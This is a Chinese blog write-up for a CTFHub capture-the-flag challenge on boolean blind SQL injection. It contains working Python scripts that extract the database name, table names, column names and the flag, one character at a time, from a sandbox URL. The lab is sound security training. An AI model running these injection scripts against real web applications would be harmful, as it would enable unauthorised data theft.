当前位置:网站首页>ctfhub-sql布尔盲注

ctfhub-sql布尔盲注

2022-06-11 17:46:00 榴莲 蛋挞

打开网址,先输入:

1 and length(database())>3

得到:

输入:

1 and length(database())<3

得到:

看出可以布尔盲注

查看当前表名:

import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,5):
    for i in range(43,126):
        ss="?id=1 and ascii(substr(database(),"+str(j)+",1))="+str(i)
        url=url1+ss
        pa=re.get(url=url).text
        if "query_success"in pa:
            st+=chr(i)
            break
print(st)

于是先得到当前数据库种包含的表名:

?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),j,1))=i
import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,10):
    for i in range(43,126):
        ss="?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),"+str(j)+",1))="+str(i)
        url=url1+ss
        pa=re.get(url=url).text
        if "query_success"in pa:
            st+=chr(i)
            break
print(st)

得到:


 再查看表格flag包含的字段:

?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),j,1))=i


 

import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,10):
    for i in range(43,126):
        ss="?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),"+str(j)+",1))="+str(i)
        url=url1+ss
        pa=re.get(url=url).text
        if "query_success"in pa:
            st+=chr(i)
            break
print(st)

得到:

 于是最后一步读取flag表种flag字段的内容:

?id=1 and ascii(substr((select flag from flag),j,1))=i


 

import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,40):
    for i in range(43,126):
        ss="?id=1 and ascii(substr((select flag from flag),"+str(j)+",1))="+str(i)
        url=url1+ss
        pa=re.get(url=url).text
        if "query_success"in pa:
            st+=chr(i)
            break
print(st)

得到:

 

原网站

版权声明
本文为[榴莲 蛋挞]所创,转载请带上原文链接,感谢
https://blog.csdn.net/god_001/article/details/125089191

边栏推荐

猜你喜欢

随机推荐